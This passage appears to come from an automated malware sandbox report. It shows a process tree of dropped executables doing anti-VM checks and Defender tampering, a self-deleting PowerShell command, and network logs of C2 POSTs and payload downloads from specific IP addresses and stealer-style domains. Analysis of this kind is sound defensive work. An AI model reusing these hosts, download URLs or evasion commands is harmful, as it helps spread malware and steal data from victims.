                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8344.1.1822939534\268606202" -parentBuildID 20221007134813 -prefsHandle 1516 -prefMapHandle 1512 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bcd6832b-aeba-4d01-9399-fa92a9a0d9ab} 8344 "\\.\pipe\gecko-crash-server-pipe.8344" 1536 e71b58 socket
                  7⤵
                  PID:8896
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8344.2.342355675\1549248957" -childID 1 -isForBrowser -prefsHandle 2072 -prefMapHandle 2068 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a685d5bc-4f6d-4dff-ac31-b6c6e99b07de} 8344 "\\.\pipe\gecko-crash-server-pipe.8344" 2084 196b0058 tab
                  7⤵
                  PID:9324
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8344.3.1431874660\1925169667" -childID 2 -isForBrowser -prefsHandle 2600 -prefMapHandle 2544 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cfceaabe-52cf-406f-821f-eda4edb85732} 8344 "\\.\pipe\gecko-crash-server-pipe.8344" 2616 1b71a258 tab
                  7⤵
                  PID:10028
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8344.4.833286185\368724119" -childID 3 -isForBrowser -prefsHandle 3720 -prefMapHandle 3716 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ce81fed-f745-42c3-ab75-87bd5fc3ec34} 8344 "\\.\pipe\gecko-crash-server-pipe.8344" 3732 2041e658 tab
                  7⤵
                  PID:8236
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8344.5.1277610581\1533465890" -childID 4 -isForBrowser -prefsHandle 3844 -prefMapHandle 3848 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0b2e47da-e0a2-4b30-8546-80d477cc01cd} 8344 "\\.\pipe\gecko-crash-server-pipe.8344" 3832 2041f258 tab
                  7⤵
                  PID:8444
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="8344.6.1822098279\25709156" -childID 5 -isForBrowser -prefsHandle 3952 -prefMapHandle 3956 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {64c90383-2dfc-4622-af38-657948ca3abd} 8344 "\\.\pipe\gecko-crash-server-pipe.8344" 3940 2041c558 tab
                  7⤵
                  PID:8524
          • C:\Users\Admin\AppData\Local\Temp\1018223001\ce6585282d.exe
            "C:\Users\Admin\AppData\Local\Temp\1018223001\ce6585282d.exe"
            4⤵
            • Modifies Windows Defender Real-time Protection settings
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Windows security modification
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3432
          • C:\Users\Admin\AppData\Local\Temp\1018224001\e0ef35828f.exe
            "C:\Users\Admin\AppData\Local\Temp\1018224001\e0ef35828f.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:4080
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2908
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {76A95B8B-5472-44E7-ACAD-64543A478BEE} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]
    1⤵
    • Loads dropped DLL
    PID:1296
    • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
      C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      PID:1328
      • C:\Windows\explorer.exe
        explorer.exe
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:952
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
        3⤵
        • Drops file in System32 directory
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3088
        • C:\Windows\system32\PING.EXE
          "C:\Windows\system32\PING.EXE" 127.1.10.1
          4⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
                              PID:3232

                      Network

                      • RU
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 4
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:31 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                      • RU
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 156
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:33 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • RU
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:37 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • RU
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:41 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • RU
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:45 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • RU
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:50 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • RU
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:57 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • RU
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:59 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • RU
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:06 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • RU
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:12 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • RU
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:18 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • RU
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:21 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • RU
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:24 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • RU
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:31 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • RU
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:34 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • RU
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:40 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • RU
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:47 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • RU
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:48:00 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • RU
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:48:04 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • RU
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:48:10 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • RU
                        GET
                        http://31.41.244.11/files/fate/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/fate/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:33 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 776832
                        Last-Modified: Tue, 17 Dec 2024 09:45:14 GMT
                        Connection: keep-alive
                        ETag: "6761482a-bda80"
                        Accept-Ranges: bytes
                      • RU
                        GET
                        http://31.41.244.11/files/london/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/london/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:37 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 1885696
                        Last-Modified: Wed, 18 Dec 2024 18:20:46 GMT
                        Connection: keep-alive
                        ETag: "6763127e-1cc600"
                        Accept-Ranges: bytes
                      • RU
                        GET
                        http://31.41.244.11/files/wicked/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/wicked/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:41 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 1114112
                        Last-Modified: Thu, 19 Dec 2024 03:43:46 GMT
                        Connection: keep-alive
                        ETag: "67639672-110000"
                        Accept-Ranges: bytes
                      • RU
                        GET
                        http://31.41.244.11/files/geopoxid/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/geopoxid/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:45 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 1880576
                        Last-Modified: Wed, 18 Dec 2024 18:02:50 GMT
                        Connection: keep-alive
                        ETag: "67630e4a-1cb200"
                        Accept-Ranges: bytes
                      • RU
                        GET
                        http://31.41.244.11/files/unique3/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/unique3/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:50 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 2013184
                        Last-Modified: Fri, 20 Dec 2024 04:32:27 GMT
                        Connection: keep-alive
                        ETag: "6764f35b-1eb800"
                        Accept-Ranges: bytes
                      • RU
                        GET
                        http://31.41.244.11/files/lolz/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/lolz/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:57 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 21504
                        Last-Modified: Wed, 18 Dec 2024 18:13:28 GMT
                        Connection: keep-alive
                        ETag: "676310c8-5400"
                        Accept-Ranges: bytes
                      • RU
                        GET
                        http://31.41.244.11/files/burpin1/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/burpin1/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:59 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 4438776
                        Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT
                        Connection: keep-alive
                        ETag: "675784f0-43baf8"
                        Accept-Ranges: bytes
                      • RU
                        GET
                        http://31.41.244.11/files/unique1/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/unique1/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:06 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 4436480
                        Last-Modified: Fri, 20 Dec 2024 04:12:50 GMT
                        Connection: keep-alive
                        ETag: "6764eec2-43b200"
                        Accept-Ranges: bytes
                      • RU
                        GET
                        http://31.41.244.11/files/martin/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/martin/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:12 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 4459008
                        Last-Modified: Fri, 20 Dec 2024 03:17:04 GMT
                        Connection: keep-alive
                        ETag: "6764e1b0-440a00"
                        Accept-Ranges: bytes
                      • RU
                        GET
                        http://31.41.244.11/files/bckosq/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/bckosq/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:18 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 810496
                        Last-Modified: Thu, 19 Dec 2024 19:41:56 GMT
                        Connection: keep-alive
                        ETag: "67647704-c5e00"
                        Accept-Ranges: bytes
                      • RU
                        GET
                        http://31.41.244.11/files/loadman/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/loadman/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:21 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 1374720
                        Last-Modified: Thu, 19 Dec 2024 17:14:58 GMT
                        Connection: keep-alive
                        ETag: "67645492-14fa00"
                        Accept-Ranges: bytes
                      • RU
                        GET
                        http://31.41.244.11/files/x3team/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/x3team/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:24 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 3286016
                        Last-Modified: Wed, 18 Dec 2024 13:43:08 GMT
                        Connection: keep-alive
                        ETag: "6762d16c-322400"
                        Accept-Ranges: bytes
                      • RU
                        GET
                        http://31.41.244.11/files/karl/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/karl/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:31 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 22016
                        Last-Modified: Thu, 19 Dec 2024 14:25:14 GMT
                        Connection: keep-alive
                        ETag: "67642cca-5600"
                        Accept-Ranges: bytes
                      • RU
                        GET
                        http://31.41.244.11/files/unique2/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/unique2/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:48:04 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 1945600
                        Last-Modified: Fri, 20 Dec 2024 04:36:55 GMT
                        Connection: keep-alive
                        ETag: "6764f467-1db000"
                        Accept-Ranges: bytes
                      • [US]
                        DNS
                        pancakedipyps.click
                        823e4bdbcb.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        pancakedipyps.click
                        IN A
                        Response
                        pancakedipyps.click
                        IN A
                        172.67.209.202
                        pancakedipyps.click
                        IN A
                        104.21.23.76
                      • [US]
                        POST
                        https://pancakedipyps.click/api
                        823e4bdbcb.exe
                        Remote address:
                        172.67.209.202:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: pancakedipyps.click
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:36 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=3ndmjlaig4tt7ln4jvcagnagl8; expires=Mon, 14 Apr 2025 22:33:15 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HKu84NZQ8IddDAPISAO%2BawBVoaHT4qXL3Suj3sEXfNPrPs04B3NYZUup6x%2FrauVoPYZk7rfb9KU9lzWFhWgM%2FVFVg8wglqD06C%2F6ao3eMc%2FoARcJizQZriP9VO4lIZ0rnnxYShoR"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd57ade7ef3c-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=61805&min_rtt=47350&rtt_var=38272&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2864&recv_bytes=587&delivery_rate=71416&cwnd=253&unsent_bytes=0&cid=a519ee574df899bb&ts=372&x=0"
                      • [US]
                        DNS
                        grannyejh.lat
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        grannyejh.lat
                        IN A
                        Response
                      • [US]
                        DNS
                        discokeyus.lat
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        discokeyus.lat
                        IN A
                        Response
                        discokeyus.lat
                        IN A
                        172.67.197.170
                        discokeyus.lat
                        IN A
                        104.21.21.99
                      • [US]
                        POST
                        https://discokeyus.lat/api
                        823e4bdbcb.exe
                        Remote address:
                        172.67.197.170:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: discokeyus.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:39 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=lb8pt48vduh7229o74jn5qv40c; expires=Mon, 14 Apr 2025 22:33:18 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hbzEn8MLgQWBs3qK1SsEXjNQXPtxwGyBSjuEvYI94D7xqMzoWMnnaw%2FVo1hYtykV7VDvkgFWF6vxhqUMYY4fJ4mCx3Fk8JfmlJrpiJ4qiESGSVHQtBgt9AgGpY39f21DpQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd68ea5c63f1-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=50123&min_rtt=47275&rtt_var=13205&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=582&delivery_rate=78988&cwnd=253&unsent_bytes=0&cid=5c9e3fb8c1f653b8&ts=233&x=0"
                      • [US]
                        DNS
                        necklacebudi.lat
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        necklacebudi.lat
                        IN A
                        Response
                        necklacebudi.lat
                        IN A
                        172.67.215.121
                        necklacebudi.lat
